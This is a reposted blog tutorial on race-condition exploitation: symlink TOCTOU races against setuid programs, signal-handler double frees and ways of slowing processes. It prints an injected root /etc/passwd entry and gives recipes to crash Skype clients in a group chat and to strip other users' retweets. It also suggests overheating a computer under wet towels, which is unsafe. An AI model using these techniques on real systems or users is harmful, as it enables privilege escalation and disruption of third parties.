Jump to content
Nytro

Winning the race: Signals, symlinks, and TOC/TOU

Recommended Posts

Winning the race: Signals, symlinks, and TOC/TOU

0faa6-1lhkwog0q8holbntyhdeo4q.png?w=816&h=9999

Introduction:

So, before we dive right into things, just a few bits of advice; some programming knowledge, an understanding of what symbolic linking is within *nix and how it works, and also an understanding of how multi-threading and signal handlers work would be beneficial for readers to understand the concepts I’m going to be covering here, but if you can’t code then don’t worry as I’m sure you’ll still be able to grasp the concepts that I’m covering. That being said, having prior programming knowledge should give you a deeper understanding of how this actually works. It won’t kill you to read up on the subjects I just mentioned, and by you doing so, you will understand this tutorial a lot easier. Ideally, if you understand C/C++ and Assembly language, then you should be able to pick up the concept of a practical (s/practical/exploitable) race condition bug relatively easily. Knowing your way around a debugger would also help.

Not all race conditions are vulnerabilities, but many race conditions can lead to vulnerabilities taking place. That being said, when vulnerabilities do happen to arise as a result of race condition bugs, they can be extremely serious. There have been cases in the past where race condition flaws have affected national critical infrastructure, in one case even directly contributing to the deaths of multiple people (No Kidding!)

Generally, within multi-threading, race conditions aren’t an issue in terms of exploitability but rather just an issue in terms of the intended program flow not going as planned (note ‘generally’, there can be exceptions where this can be used for exploitation rather than being a mere design issue).

Anyway, before getting into specific kinds of race condition bugs, it should be noted that these bugs can exist in anything from a low-level Linux application to a multi-threaded relational DBMS implementation. In terms of paradigm, if your code is purely functional (I’m talking in terms of paradigm here, although I guess that particular use of terminology is interchangeable as if your code suffers from race condition flaws then it lacks functionality in the non-paradigm sense too) then race conditions will not occur. 

 

So, what exactly are race conditions?

Let’s take a moment to sit back and enter the land of imagination. For the sake of this post, let’s pretend you’re not a fat nerd sitting in your Mom’s basement living off of beer and tendies while making sweet sweet love to your anime waifu pillow. Lets imagine, just for one moment, that you’re someone else. You’re not just any old someone, no. You’re someone who does something important. You’re a world-class athlete. You spent the last 4 years training non-stop for the 100m Sprint, you are certain you are going to win the Gold Medal this year. The time finally comes. you are ready to race. During the sprint, you’re neck-to-neck with Usain Bolt, both inches away from the finish line. By sheer chance, you both pass over the finish line at the exact same moment. The judges replay the footage in slow-motion to see who passed the finish line first, and unbelievably, you both passed the finish line at the exact same moment, down to the very nanosecond! Now the judges have a problem. Who wins Gold? You? Usain Bolt? The runner-up who crossed the line right after you two? What if nobody wins? What if you’re both given Gold, decreasing the subjective value of the medal? What if the judges call off the event entirely? What if they demand a re-match? What if a black hole suddenly spawns in the Olympic arena and causes the entire solar system to implode? Who the hell knows, right? Well, welcome to the wild and wacky world of race conditions!

This is Part One of a Three-Part series diving into the subject of race conditions, there’s absolutely no way I can cover this whole subject in three blog posts. Try three books maybe! Race Conditions are a colossally huge subject with a wide variety of security implications ranging from weird behaviour that poses no risk at all, to crashing a server, to full-blown remote command execution! Due to the sheer size of this topic, I suggest doing research in your own time between reading each part of this tutorial series.

While at first it might seem intimidating, this is actually a very simple concept to grasp (exploiting it on the other hand is a bit more hit and miss, but I’ll get into that later). Race conditions stem from novice developers making the assumption that their code will execute in a linear fashion, or as a result of developers implementing multi-threading in an insecure manner. If their program then attempts to perform two or more operations at the same time then this can cause changes within the code flow of the program to end with undesirable results (or desirable, depending on whether you’re asking the attacker or the victim!). 

It should also be noted (as stated before) that race conditions aren’t necessarily always a security risk, in some cases they can just cause unexpected behaviour within the program flow while leading to no actual risk. Race conditions can occur in many different contexts, even within basic electronics (and biology! Race Conditions have been observed within the brains of live rats). I will be covering race conditions from an exploitation standpoint, and I will mainly be talking about race conditions within web applications or within vulnerable C programs. 

The basic premise of a race condition bug is that two threads to “race” against eachother, allowing the winner of said race to manipulate the control flow of the vulnerable application.

I’ll be touching lightly upon race conditions being present in multi-threaded applications and will give some brief examples, but this will mainly be focused on races as a result of signal handling, faulty access checks and symlink tricks. In addition to that, I’ll give some examples of how this class of bugs can be abused within Web applications. Race conditions cover such a broad spectrum that I simply cannot discuss all of it within one blog post, so I’ll give a quick overview of the basics, which hopefully you can build upon with your own research.

To give you a more simple analogy of what a race condition is, imagine you have online banking with a banking platform. Let’s assume you open two separate browser tabs at once, both with the payment page loaded, you then setup both browser tabs so that you’re ready to make your payment to another bank account —  if you were to then click the button to make the payment in both tabs at identical times, it could register that only one payment had been made, when in reality the payment had been made twice but only the money for one of the payments has been deducted from your bank balance. This is a very basic analogy of how a race condition could take place, although this is highly unlikely to ever happen in a real world scenario.

I’m going to demonstrate some code snippets to explain this, in order to show different kinds of races that are possible and give examples in various languages, but I’ll start pseudo-code :

0faa6-1lhkwog0q8holbntyhdeo4q.png The code above is C-inspired pseudo-code

The reason I gave the first example in C is because race conditions tend to be very common within vulnerable C applications. Specifically you should be looking for the signal.h header as this is generally a good indicator of a potential race condition bug being present within issues regarding signal handling at least). Another good indicator is if there are access checks present for files as this can often lead to symlink races taking place (I will demonstrate this shortly). I will give other examples in other languages, and explain context-specific race condition bugs associated with such languages.

While this code above is clearly not a working example, it should allow me to illustrate the concept of race conditions. Lets assume an attacker sends two operations to the program at the same time, and the code flow states that if permitted, then execute the specified function. If timed correctly, an attacker could make it so that something is permitted at the time of check, but that thing may no longer be permitted at the time of use (this would be a TOC/TOU race — meaning “Time of Check / Time of Use”). 

So for example, we can assume that the following test is being ran:

if (something_is_permitted) // check if permitted

and the conditions for the if statement are met and the code flow will continue in the intended order, but when the function gets called, the thing that was not permitted is now considered to be permitted, so it will execute the following code:

doThis();

This will result in unintended program flow and depending on the nature of the code it could allow an attacker to bypass access controls, escalate privileges, cause a denial of service, etc.

The impact of race condition bugs can vary greatly, ranging from a petty nuisance to critical exploits resulting in the likes of remote root. I’ll begin by describing various types of race conditions and methods of triggering them, before moving on to some real-world examples of race conditions and an explanation of how they can be tested for within potentially vulnerable web applications.

When most people think of Race Conditions, they imagine them to be something very fast-paced. People expect the timing required to execute a TOC/TOU race would need to be extremely precise. While this is often the case, it is not always the case. Consider the following example of a “slow-paced” race condition bug:

  • There exists a social-networking application where users have the ability to edit their profile
  • A user clicks the “edit profile” button and it opens up the webpage to allow them to make edits
  • User then goes AFK (Away from Keyboard)
  • The administrator finds an unrelated vulnerability in the profile editing section of the website, and as a result, locks down the edit functionality so that users can no longer edit their profile
  • User returns, and still has the profile editing page open in a browser tab
  • Despite new users not being able to access the “edit profile” page, this user already has the page opened and can continue to make edits despite the restriction put in place by the administrator 

Race Conditions can also take place as a result of latency within networks. Take an IRC for example, let’s assume that there is a hub and two linked nodes. Bob wants to register the channel #hax yet Alice also wants to register this same channel. Consider the following:

  • Bob connects to IRC from node #1
  • Alice connects to the IRC from node #2
  • Bob runs /join #hax 
  • Alice runs /join #hax
  • Both of these commands are ran from separate nodes at around the same time
  • Bob becomes an operator of #hax
  • Alice becomes an operator of #hax
  • The reasoning for this, is, due to network latency, node #1 would not have time to send a signal to node #2 to alert it that the Services Daemon has already assigned operator status to another user on the same network.
(PROTIP: When testing local desktop applications for Race Conditions - for example a compiled binary - use something like GDB or OllyDBG to set a breakpoint between TOC and TOU within the source code of the binary you are debugging. Execute your code from the breakpoint and take note of the results in order to determine any potential security risk or lack thereof. This is for confirmation of the bug only, and not for actual exploitation. As the saying goes, PoC||GTFO. This rings especially true with race conditions considering some of them are just bugs or glitches or whatever you wanna call them, as opposed to viable exploits with real attack value. If you cannot demonstrate impact, you probably should not report it)

Symlinks and Flawed access checks:

Using symlinks to trigger race conditions is a relatively common method. Here I will give a working example of this. The example will show how a symlink race can be used to exploit a badly implemented access check in C/C++ — this would allow an attacker to horizontally perform privilege escalation in order to get root on a server (assuming the server had a program that was vulnerable in this manner) — it should be noted that while writing to /etc/passwd in the manner I’m about to demonstrate will not work on newer operating systems, these methods can still be used to obtain read (or sometimes write) perms to root-owned files that generally would not be accessible from a regular user account.

This method assumes that the program in question is being ran with setuid access rights. The intended purpose of the program is that it will check whether you have permissions to write to a specific directory (via an access(); check) — if you have permission, it will write your user input to the directory of choice. If you don’t have permission, then the access(); check is intended to fail, indicating that you’re attempting to write to a directory or file of which you lack the permissions to write to. For example, the /tmp directory is world-writeable, whereas a directory such as /etc would require additional permissions. The goal of an attacker here is to abuse symbolic linking to trick the program into thinking it is writing to /tmp where it has permission, when in fact it is writing to /etc where it lacks permissions 

In modern Linux Distributions (and in modern countermeasures implemented into languages such as C), there are ways of attempting to mitigate such an attack. For example, the POSIX C stdlib can use the mkstemp(); function as opposed to fwrite(); or fopen(); in order to create temporary files, and respectively mktemp(1) allows for creation of temporary files within *nix-based systems. Another attempt at mitigating this in *nix-based systems is the O_NOFOLLOW flag for open() calls — the purpose of this flag is to prevent files being opened by a symbolic link. 

Take a look at the following vulnerable code (this is a race condition between the original program and a malicious one which will be used):

cc89c-1rkmkg5igmrvsauu8_fqo9q.png Example suid program vulnerable to a typical TOC/TOU symlink race condition through means of an insufficient access check.

I will be compiling and running this from my user account with the following privs (non-root):

4a01c-17sooiqtqbiljcdf9divjzw.png

First, I will demonstrate this using a debugger (GBD, although others such as OllyDbg will suffice too) because it allows you to pause the execution of the program allowing for race conditions to take place easier — in a real exploitation scenario you would need to trigger the race condition naturally which i will demonstrate next.

First, disassemble the code using your debugger of choice:

e699f-1o8plnajaxbzxnfgpgkuyra.png

Now, set a breakpoint at fopen(); so we can demonstrate a race condition without actually having to go through the steps to trigger one naturally:

break *0x80485ca

2b8b8-1erbapidw9gwesbc5ejmjwq.png

Then replace the written file via a symbolic link like so:

d7ad7-1tudbdvuqcdzbenthrpigjw.png

Now that you’ve paused the execution of the program flow through use of a breakpoint, resuming the program flow (after the symlink has been made) would cause the access check to be passed, meaning the program would continue to run as intended and would write some input to the file that would usually only be writeable had the access check been passed.

Of course, using GDB or another debugger isn’t possible in real world scenarios, therefore it is relevant to implement something that will allow the race conditions to take place naturally (instead of setting a breakpoint and pausing the program execution with a debugger to get the timing right). One way of doing this is by repeatedly performing two options at the same time, until the race conditions are met. 

The following example will show how the access check in the vulnerable C program can be bypassed as a result of two bash scripts running simultaneously. Once the race condition is successfully met, it will result in the access check being passed and will write a new entry to /etc/passwd

Script #1:

dce95-1g3jxolxx6oc3yveg0bd-nw.png This script should be running repeatedly until the condition is met, that’s why it is re-executing itself within the while loop

Script #2:

e31c7-1i1cxrd_e8tvecnsm01ozaa.png This script will repeatedly be attempting to make a symbolic link to /etc/passwd

After a while of both of these script running at the same time, it should eventually get the timing correct so that the symbolic link is made prior to completion of the access check, causing the access check to be bypassed and some data to be written to a previously restricted file (/etc/passwd in this case)

If all goes to plan, an attacker should be able to write a new entry to /etc/passwd with root privs:

raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh

From here, they can simply use ‘su’ in order to authenticate as a root user with the new ‘raceme’ account that they have created by adding an entry to /etc/passwd

9cc45-1qjxg12jl2dw6ap2g2woesw.png g0t r00t!!

 

Race Conditions within Signal Handling:

If you do not understand the concept of Signal Handlers within programming then now is probably a good time to become familiar with the subject, as it is one of the primary causes of race condition flaws.

The most common occurrence of race conditions within Signal Handlers is when the same function installed as a signal handler is utilized for the handling of multiple different signals and when those different signals are called via the same signal handling function within a short time-frame of eachother (hence the race condition). “Non-Reentrant” Signals are the primary culprit that result in signal-based races posing an issue. If you’re unfamiliar with what the concept of non-reentrance is within Signal Handling, then I really do suggest reading into the topic in-depth, but if you’re like me and have a TL;DR attitude and just wanna go hack the planet already, then I will offer a short and sweet explanation (the terminology used to describe it alone is somewhat self-explanatory in all honesty).

If a function has been installed with signal handling operations in mind, and if aforementioned function either maintains an internal state or calls another function that maintains an internal state then its a non-reentrant function and this means it has a higher probability of a race condition being a possibility.

For an example demonstrating exploitability of race condition bugs associated with signal handlers, I will be using the free(); function (associated with dynamic memory allocation in C/C++) to trigger a traditional and well-known application-security flaw referred to as a “double free”. The following code examples shows how an attacker could craft a specifically timed payload – If you’re not spotting their common trend here, race conditions are all about timing. Generally attackers will have their payloads running concurrently in a for/while loop, or they’ll create a ghetto-style “loop” of sorts by having payload1.sh repeatedly execute payload2.sh which in turn will repeatedly execute payload1.sh and so on and so on. The reasoning for this is because in many contexts, for a race condition to be successful, the requests need to be made concurrently sometimes even down to the exact millisecond. Rather than executing their payload once and hoping they got their one-in-a-million chance of getting the timing exactly right it makes far more sense to use a loop to repeatedly execute the payload, as with each iteration of the loop, the attacker has another chance of getting the timing right. Pair this with methods of slowing down execution of certain processes and now the attacker has increased their window (the “window” in this instance referring to the viable time in which the race condition can occur, allowing the attack to be carried out). For example with a TOC/TOU Race, the “attack window” would be the time between the check taking place (hence “TOC” – “Time of Check”), and the timee when the action occurs (“TOU” – “Time of Use”) between the check being carried out again. The “attack window” in this instance is the time frame in which the check being carried out is saying that the actual occurring is permitted, which for a very short time period (or “window”) it is permitted… up until the iteration wherein the next check occurs, when the action is there no longer permitted meaning the window has closed.

  • maximising the window in which the attack can be carried out by slowing down particular aspects of program/process execution (I cover methods of doing this in a chapter here)
  • making as many concurrent attempts at triggering the race within the time-frame dictated by the length of your attack window. Use multiple threads where possible.
  • Testing manually with a debugger via setting breakpoint between TOC and TOU
  • Having lots of processing power available to make as many concurrent requests as possible during your attack window (while using the methods I describe to slow down other elements of process execution at the same time)

Below you can find an example of a Race Condition present via signal handling, with triggering of a double free as a Proof-of-Concept. This code example uses the same signal handler function which is non-reentrant and makes use of a shared state. The function in question is the free(); function, and in this code example an attacker could send two different signals to the same signal handler at the same time, resulting in memory corruption taking place as a direct result of the race condition itself. If you have experience with C/C++ and dynamic memory allocation then you’re probably aware of the issues posed by a double free triggered as a result of calling free(); twice with the same argument. For those who are not aware, this is known as a “double free bug” and it results in the programs memory structures becoming corrupted which can cause a multitude of problems ranging from segfaults and crashes, to arbitrary code execution as a result of the attacker being able to control the data written into the memory region that has been doubly-allocated, resulting in a buffer overflow taking place. While the RCE triggered by the overflow which in turn was triggered by the double free… the double free itself is triggered as a restult of a race condition occuring due to two separate signals being sent to the free(); signal handler, which, withou getting overly technical, essentially makes malloc(); throw a hissy-fit and poop its pants. The following code demonstrates this issue:

#include <stdio.h>
#include <vulnerable.lol>
#define RACE_CONDITION LOL

void vuln(int pwn) {
  // some lame program
  free(globvar);
  free(globvar2);
  // double free 
}

int main(int argc,char* argv[]) {
  // overflowz and code exec
  signal(SIGHUP,vuln);
  signal(SIGTERM,vuln);
  // all due to a pesky race condition
}

There are a number of reasons why signal handling can result in race conditions, although using the same function as a handler for two or more separate signals is one of the primary culprits.

Here is a list of reasons as to what could trigger a race condition via signal handling (from Mitre’s CWE Database):

  • Shared state (e.g. global data or static variables) that are accessible to both a signal handler and “regular” code
  • Shared state between a signal handler and other signal handlers
  • Use of non-reentrant functionality within a signal handler – which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution.
  • Association of the same signal handler function with multiple signals – which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses.
  • Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality
  • While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses.

Out of everything just listed, the most common reasons are either one signal handler is being used for multiple signals, or two or more signals arrive in short enough succession of eachother to fit the attack window for a TOCTOU race condition.

 

Methods of slowing down process execution:

Slowing down the execution process of the program is almost vital to effectively achieve race conditions more consistently, here I will describe somethe common methods that can be used to achieve this. Some of these methods are outdated and will only work on older sytems, but they are still worth including (especially if you’re into CTF’s)

Deep symlink nesting (as described above) is one old method that can be used to slow down program execution in order to aid race conditions. Another method that can be used is by changing the values for the environment variable LD_DEBUG — setting this to a different value will result in output being sent to stderr, if you were to then redirect stderr to a pipe, it can slow down or completely halt the setuid bin in question. To do this you would do something as follows:

LD_DEBUG=all;some_program 2>&1

Usage of LD_DEBUG is somewhat outdated, no longer relevant within setuid binaries since the upgrade to glibc 2.3.4 — that being said, this can still be used for some more esoteric bugs affecting legacy systems, and is also occasionally seen as solutions for CTF’s

Another method of slowing down program execution is by lowering its scheduling priority through use of the nice or renice commands. Technically, this isn’t slowing down the program execution as such, but it’s rather forcing the Linux scheduler to allocate less time frames towards the execution of the program, resulting in it running at a slower rate. It should also be noted that this can be achieved within code (rather than as a terminal command) through use of the nice(); syscall. If the value for nice is a negative value, then the process will run with higher priority. If it is a positive value, then the process will run with lower priority. For example, setting the following value will cause the process to run at a ridiculously slow rate:

nice(19)

If you’re familiar with writing Linux rootkits, then you may already be aware of these methods, but you can use dynamic linker tricks via LD_PRELOAD in order to slow down the execution of processes too. This can be done by hooking common functions such as malloc(); or free(); then once said functions are called within the vulnerable program, their speed of execution will be slowed down to a nominal extent.

One extremely trivial way of slowing down the execution of a program is to simply run it within a virtualized environment. If you’re using a virtual machine, then there should be options available that will allow you to limit the allocated amount of CPU resources and RAM, allowing you to test the potentially vulnerable program in a more controlled environment where you can slow things down with ease and with a lot of control. This method will only work while testing for certain classes of race conditions.

One crude method to slow down program/process executioon speeds in order to increase the chance of a race condition occuring is taking physical measures to overheat your computer, putting strain on its ability to perform computational tasks. Obviously, this is dangerous for the health of your device so don’t come crying to me if you wind up breaking your computer. There are many ways to do this, but the way I’ve seen it done (which is, according to my crazy IRL hacker friend) is supposedly one of the safer methods of physically overheating your computer — simply wet a towel (or a bunch of towels) and wrap them around your device while making sure than the fan in particular is covered completely.

Deep symlinks can also be used to slow down the execution of the program, which is extremely valuable while attempting to exploit race conditions. This is a very old and well-documented method, although these days it is practically useless (unless you’re exploiting some old obscure system, or if you’re doing it for a CTF — I have seen this method utilized in CTF challenges before). Since Linux Kernel 2.4x, this method has been mitigated through implementation of a limit on the maximum number of symlink dereferences permitted during lookups alongside limits on nesting depths. Despite this method being practically dead, I figured it’s still worth covering because there are still some obscure cases where this can be utilized.

below is a script written by Rafal Wojtczuk demonstrating how this can be done (the example shown here can be found at Hacker’s Hut😞

943fc-1q9c8oxnpxo_nzgwoqobfig.png

This will cause the kernel to take a ridiculously long length of time to access a single file, here is the situation presented when the above script is executed:

drwxr-xr-x 2 aeb 4096 l
lrwxrwxrwx 1 aeb 53 l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services
lrwxrwxrwx 1 aeb 19 l1 -> l2/../l2/../l2/../l
lrwxrwxrwx 1 aeb 19 l2 -> l3/../l3/../l3/../l
lrwxrwxrwx 1 aeb 19 l3 -> l4/../l4/../l4/../l
lrwxrwxrwx 1 aeb 19 l4 -> l5/../l5/../l5/../l
drwxr-xr-x 2 aeb 4096 l5

Depending on how many parameters are passed to the above bash script, the larger the depth of the symlinks, meaning it can take days or even weeks for the one process to finish completion. On older machines, this will result in application-level DoS.

There are many other ways in which symbolic links can be abused in order to achieve race conditions, if you want to learn more about this then I’d suggest googling as there’s simply too much to explain in a single blog post.

Yet another method to slow down program execution is by increasing the timer interrupt frequency in order to force more load onto the kernel. Timer Interrupts within the Linux Kernel have a long and extensive history, so I will not be going in-depth here.

In part 2 of this tutorial series you can expect many more advanced methods to slow down process execution.

 

Final notes (and zero-days):

I intentionally chose to leave out a number of methods for testing/exploiting race condition bugs within web applications, although I’ll be covering these in-depth in Part 2 of my race condition series.

Meanwhile, I’ll give you an overview of what you can expect with Part 2, while also leaving you two race condition 0day exploits to (ethically) play around with.

The second part of my tutorial series regarding race conditions is going to have a primary emphasis on race conditions in webapps, which I touched upon lightly in this current post. This post was my attempt at explaining what race conditions are, how they work, how to (ab)use them, and the implications of their existence in regards to bug bounty hunting. Now that I’ve covered what these bugs are and also provided a few examples of real working exploits demonstrating that race conditions do indeed exist within webapps, I’m going to be spending most of part two covering the following three areas:

  • More advanced techniques of identifying race conditions specifically within web applications, methods of bypassing protections against this, lucrative sections of webapps to test in order to increase your chances at finding race condition bugs on a regular basis within web applications.
  • More advanced (and several private) techniques used to slow down process execution, both within regular applications and within web applications (although mostly with emphasis on web applications since that will be the primary theme of Part 2 of this series), and how to use some practical dynamic linker tricks through hooking of (g)libc functions via LD_PRELOAD in userland/ring3, exactly like you would do with a rootkit, but with emphasis on using this to slow down program/process execution due to added strain on hooked common functions, as opposed to use of dynamic linker for stealth-based hooking. We are talking about exploiting race conditions here, not writing rootkits — so while some of these techniques are kind-of interchangeable, the methods I’ll be sharing would be very inefficient for an LD_PRELOAD based rootkit as it would make the victim’ machine slow as shit. For maintaining persistence on a hacked box, this is terrible, but for slowing down process execution to increase the odds of a race condition, this is great! You can expect me to expand upon dozens of methods of slowing down process execution to increase your odds of winning that race!
  • Finally, just like this first part of my race condition exploitation series, I’ll be setting a trend by once again including two new zero-day exploits which are both race condition bugs.

 

Skype Race Condition 0day:

  • Create a Skype group chat
  • Add a bunch of people
  • Make two Skype bots and add them to the chat
  • Have one bot repeatedly set the topic to ‘lol’ (lowercase)
  • Have the other bot repeatedly set the topic to ‘LOL’ (uppercase)

example, bot #1 repeatedly sends “/topic lololol” to the chat and bot #2 repeatedly sends “/topic LOLOLOL”

If performed correctly, this will break the Skype client for everyone in the group chat. Every time they reload Skype, it will crash. It also makes it impossible for them to leave the group chat no matter what they try. The only way around this is to either create a fresh Skype account, or completely uninstall Skype, access skype via web (web.skype.com) to leave the group, and then reinstall Skype again.

 

Twitter API TOC/TOU Race Condition 0day:

There was a race condition bug affecting twitter’s API. This is a generic TOC/TOU race condition which allows various forms of unexpected behaviour to take place. By sending API requests concurrently to Twitter, it can result in the deletion of other people’s likes/retweets/followers. You would write a script with multiple threads, some threads sending an API request to retweet or like a tweet (from a third-party account), and the other threads simultaneously removing likes/RT’s from the same tweet from the same third-party account, once again making a request t Twitter’s API in order to do so. As a result of the Race Condition taking place, this would remove multiple likes and retweets from the affected post, rather than only the likes and retweets set to be removed via the API requests sent from the third-party account. While this has no direct security impact, it can drastically affect the outreach of a popular tweet. While running this script to simultaneously send the API requests from a third-party account, we managed to reduce a tweet with 2000+ Retweets down to 16 Retweets in a matter of minutes. The Proof-of-Concept code for this will be viewable within the “Exploits and Code Examples” section of the upcoming site of 0xFFFF where we plan to eventually integrate this blog. To see how this works in detail, you can read the full writeup here, published by a member of our team.

 

That’s all for now — part two will be coming soon with more zerodays and a much bigger emphasis on exploitation of race condition bugs within web applications.

 

Sursa: https://blog.0xffff.info/2021/06/23/winning-the-race-signals-symlinks-and-toc-tou/

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...